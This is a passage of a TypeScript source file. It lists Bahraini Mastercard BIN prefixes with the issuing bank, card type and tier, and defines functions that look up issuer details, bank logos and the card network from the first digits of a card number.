  '540729': { bank: 'NBB', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '543256': { bank: 'NBB', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  // Ahli United Bank (AUB) - البنك الأهلي المتحد
  '510990': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '513702': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '514732': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '523443': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Debit', tier: 'Platinum' },
  '524185': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '531415': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '532677': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Debit', tier: 'Platinum' },
  '533771': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '539711': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Debit', tier: 'World' },
  '544097': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '545070': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '557668': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '559418': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Debit', tier: 'Platinum' },
  '559583': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '559584': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '559592': { bank: 'AUB Bahrain', network: 'Mastercard', type: 'Credit', tier: 'World' },
  // Bahrain Islamic Bank (BisB) - بنك البحرين الإسلامي
  '524500': { bank: 'BisB', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '525106': { bank: 'BisB', network: 'Mastercard', type: 'Credit', tier: 'Business' },
  '528954': { bank: 'BisB', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '529283': { bank: 'BisB', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '534168': { bank: 'BisB', network: 'Mastercard', type: 'Credit', tier: 'Corporate World' },
  '547019': { bank: 'BisB', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '548528': { bank: 'BisB', network: 'Mastercard', type: 'Debit', tier: 'Prepaid' },
  '556550': { bank: 'BisB', network: 'Mastercard', type: 'Credit', tier: 'Corporate World' },
  // Ithmaar Bank - بنك الإثمار
  '512008': { bank: 'Ithmaar Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '518867': { bank: 'Ithmaar Bank', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '546024': { bank: 'Ithmaar Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '546758': { bank: 'Ithmaar Bank', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '548108': { bank: 'Ithmaar Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '548109': { bank: 'Ithmaar Bank', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '548110': { bank: 'Ithmaar Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '548111': { bank: 'Ithmaar Bank', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '555926': { bank: 'Ithmaar Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '548542': { bank: 'Ithmaar Bank', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '532714': { bank: 'Ithmaar Bank', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '524124': { bank: 'Ithmaar Bank', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '517512': { bank: 'Ithmaar Bank', network: 'Mastercard', type: 'Debit', tier: 'Prepaid' },
  '510375': { bank: 'Ithmaar Bank', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  // Kuwait Finance House Bahrain (KFH Bahrain) - بيت التمويل الكويتي البحرين
  '537882': { bank: 'KFH Bahrain', network: 'Mastercard', type: 'Debit', tier: 'World' },
  // HSBC Bahrain - إتش إس بي سي البحرين
  '555013': { bank: 'HSBC Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Purchasing' },
  '555007': { bank: 'HSBC Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Corporate' },
  '555004': { bank: 'HSBC Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Corporate' },
  '552107': { bank: 'HSBC Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '548162': { bank: 'HSBC Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '548139': { bank: 'HSBC Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '545594': { bank: 'HSBC Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '543041': { bank: 'HSBC Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '542830': { bank: 'HSBC Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '526195': { bank: 'HSBC Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Corporate' },
  // Standard Chartered Bahrain - ستاندرد تشارترد البحرين
  '518715': { bank: 'Standard Chartered Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '518719': { bank: 'Standard Chartered Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '518817': { bank: 'Standard Chartered Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '523614': { bank: 'Standard Chartered Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '523965': { bank: 'Standard Chartered Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '537178': { bank: 'Standard Chartered Bahrain', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '552296': { bank: 'Standard Chartered Bahrain', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  // Arab Bank Bahrain - البنك العربي البحرين
  '552349': { bank: 'Arab Bank Bahrain', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  // Gulf International Bank (GIB) Bahrain - بنك الخليج الدولي البحرين
  '524201': { bank: 'GIB Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Corporate' },
  '552307': { bank: 'GIB Bahrain', network: 'Mastercard', type: 'Credit', tier: 'World Business' },
  // ila Bank - إيلا بنك
  '528522': { bank: 'ila Bank', network: 'Mastercard', type: 'Debit', tier: 'Prepaid' },
  // Al Baraka Islamic Bank - بنك البركة الإسلامي
  '511659': { bank: 'Al Baraka Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '529070': { bank: 'Al Baraka Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '533421': { bank: 'Al Baraka Bank', network: 'Mastercard', type: 'Debit', tier: 'World' },
  '534634': { bank: 'Al Baraka Bank', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '537995': { bank: 'Al Baraka Bank', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '539969': { bank: 'Al Baraka Bank', network: 'Mastercard', type: 'Debit', tier: 'World' },
  '543719': { bank: 'Al Baraka Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '543752': { bank: 'Al Baraka Bank', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '543774': { bank: 'Al Baraka Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '543777': { bank: 'Al Baraka Bank', network: 'Mastercard', type: 'Debit', tier: 'Prepaid' },
  '554969': { bank: 'Al Baraka Bank', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '555931': { bank: 'Al Baraka Bank', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  // CrediMax B.S.C. - كريدي ماكس
  '540273': { bank: 'CrediMax', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '543277': { bank: 'CrediMax', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '517733': { bank: 'CrediMax', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '552110': { bank: 'CrediMax', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '555938': { bank: 'CrediMax', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  // State Bank of India Bahrain
  '555923': { bank: 'SBI Bahrain', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  // Bahrain Commercial Facilities Company (BCFC)
  '542057': { bank: 'BCFC', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '527017': { bank: 'BCFC', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '510543': { bank: 'BCFC', network: 'Mastercard', type: 'Debit', tier: 'Prepaid' },
  // Arab Bank - Mastercard BINs
  '524177': { bank: 'Arab Bank Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  // Arab Financial Services - Additional Mastercard BINs
  '513420': { bank: 'Arab Financial Services', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '517728': { bank: 'Arab Financial Services', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '520073': { bank: 'Arab Financial Services', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '520074': { bank: 'Arab Financial Services', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '520075': { bank: 'Arab Financial Services', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '520076': { bank: 'Arab Financial Services', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '527580': { bank: 'Arab Financial Services', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '533178': { bank: 'Arab Financial Services', network: 'Mastercard', type: 'Credit', tier: 'Corporate' },
  '540683': { bank: 'Arab Financial Services', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '542629': { bank: 'Arab Financial Services', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '545788': { bank: 'Arab Financial Services', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '547010': { bank: 'Arab Financial Services', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '552785': { bank: 'Arab Financial Services', network: 'Mastercard', type: 'Credit', tier: 'Corporate' },
  // Ithmaar Bank - Additional BINs
  '516054': { bank: 'Ithmaar Bank', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  // Standard Chartered - Additional BINs
  '518543': { bank: 'Standard Chartered Bahrain', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  // NBB - Additional BINs
  '524259': { bank: 'NBB', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  // CrediMax - Additional Mastercard BINs
  '519309': { bank: 'CrediMax', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '538721': { bank: 'CrediMax', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '559944': { bank: 'CrediMax', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  // Network International
  '512686': { bank: 'Network International', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '526848': { bank: 'Network International', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '532189': { bank: 'Network International', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  // Universal Financing Services
  '525878': { bank: 'Universal Financing', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '531221': { bank: 'Universal Financing', network: 'Mastercard', type: 'Credit', tier: 'Corporate' },
  '533768': { bank: 'Universal Financing', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  // Cards Financial Services Company
  '547047': { bank: 'Cards Financial Services', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  // Yorkshire Bank
  '547052': { bank: 'Yorkshire Bank', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  // Faysal Islamic Bank of Bahrain
  '548930': { bank: 'Faysal Islamic Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  // AMEX Middle East (Mastercard-processed)
  '589453': { bank: 'CrediMax', network: 'Mastercard', type: 'Debit', tier: 'Maestro' },
};

// قاعدة البيانات الموحدة
export const BIN_DATABASE: Record<string, BinInfo> = {
  ...MADA_BINS,
  ...VISA_BINS,
  ...MASTERCARD_BINS,
  ...KUWAIT_VISA_BINS,
  ...KUWAIT_MASTERCARD_BINS,
  ...BAHRAIN_VISA_BINS,
  ...BAHRAIN_MASTERCARD_BINS,
};

// دالة للحصول على معلومات BIN
export function getBinInfo(cardNumber: string): (BinInfo & { bankLogo: string; cardTypeLogo: string }) | null {
  const cleanNumber = cardNumber.replace(/\s/g, '');
  if (cleanNumber.length < 6) return null;
  
  const bin6 = cleanNumber.substring(0, 6);
  const binInfo = BIN_DATABASE[bin6];
  
  if (binInfo) {
    return {
      ...binInfo,
      bankLogo: BANK_LOGOS[binInfo.bank] || '/images/banks/default.png',
      cardTypeLogo: CARD_TYPE_LOGOS[binInfo.network] || '',
    };
  }
  
  return null;
}

// دالة لتحديد نوع البطاقة
export function getCardType(cardNumber: string): 'Visa' | 'Mastercard' | 'mada' | '' {
  const cleanNumber = cardNumber.replace(/\s/g, '');
  if (cleanNumber.length < 4) return '';
  
  const bin6 = cleanNumber.substring(0, 6);
  
  // تحقق من قاعدة البيانات أولاً
  if (MADA_BINS[bin6]) return 'mada';
  if (VISA_BINS[bin6] || BAHRAIN_VISA_BINS[bin6]) return 'Visa';
  if (MASTERCARD_BINS[bin6] || BAHRAIN_MASTERCARD_BINS[bin6]) return 'Mastercard';
  
  // تحديد افتراضي بناءً على أول رقم
  if (cleanNumber.startsWith('9')) return 'mada';
  if (cleanNumber.startsWith('4')) return 'Visa';
  if (/^5[1-5]/.test(cleanNumber) || /^2[2-7]/.test(cleanNumber)) return 'Mastercard';
  
  return '';
}
